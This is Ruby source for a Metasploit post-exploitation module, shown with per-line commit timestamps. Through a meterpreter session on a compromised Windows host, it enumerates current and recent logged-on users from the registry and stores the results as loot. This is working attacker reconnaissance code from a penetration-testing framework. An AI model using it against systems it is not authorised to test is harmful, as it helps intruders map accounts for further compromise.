2011-01-12 18:29:56 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-01-12 18:29:56 +00:00
|
|
|
##
|
2011-01-11 02:02:11 +00:00
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
include Msf::Post::Windows::Accounts
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Logged On User Enumeration (Registry)',
|
|
|
|
'Description' => %q{ This module will enumerate current and recently logged on Windows users},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('CURRENT', [ true, 'Enumerate currently logged on users', true]),
|
|
|
|
OptBool.new('RECENT' , [ true, 'Enumerate Recently logged on users' , true])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def ls_logged
|
|
|
|
sids = []
|
|
|
|
sids << registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList")
|
2016-08-10 18:30:09 +00:00
|
|
|
tbl = Rex::Text::Table.new(
|
2013-08-30 21:28:54 +00:00
|
|
|
'Header' => "Recently Logged Users",
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"SID",
|
|
|
|
"Profile Path"
|
|
|
|
])
|
|
|
|
sids.flatten.map do |sid|
|
|
|
|
profile_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\#{sid}","ProfileImagePath")
|
|
|
|
tbl << [sid,profile_path]
|
|
|
|
end
|
|
|
|
print_line("\n" + tbl.to_s + "\n")
|
|
|
|
store_loot("host.users.recent", "text/plain", session, tbl.to_s, "recent_users.txt", "Recent Users")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def ls_current
|
|
|
|
key_base, username = "",""
|
2016-08-10 18:30:09 +00:00
|
|
|
tbl = Rex::Text::Table.new(
|
2013-08-30 21:28:54 +00:00
|
|
|
'Header' => "Current Logged Users",
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"SID",
|
|
|
|
"User"
|
|
|
|
])
|
|
|
|
registry_enumkeys("HKU").each do |maybe_sid|
|
|
|
|
# There is junk like .DEFAULT we want to avoid
|
|
|
|
if maybe_sid =~ /^S(?:-\d+){2,}$/
|
|
|
|
info = resolve_sid(maybe_sid)
|
|
|
|
|
|
|
|
if !info.nil? && info[:type] == :user
|
|
|
|
username = info[:domain] << '\\' << info[:name]
|
|
|
|
|
|
|
|
tbl << [maybe_sid,username]
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
print_line("\n" + tbl.to_s + "\n")
|
|
|
|
p = store_loot("host.users.active", "text/plain", session, tbl.to_s, "active_users.txt", "Active Users")
|
2017-07-19 12:02:49 +00:00
|
|
|
print_good("Results saved in: #{p}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
print_status("Running against session #{datastore['SESSION']}")
|
|
|
|
|
|
|
|
if datastore['CURRENT']
|
|
|
|
ls_current
|
|
|
|
end
|
|
|
|
|
|
|
|
if datastore['RECENT']
|
|
|
|
ls_logged
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
2011-01-11 02:02:11 +00:00
|
|
|
end
|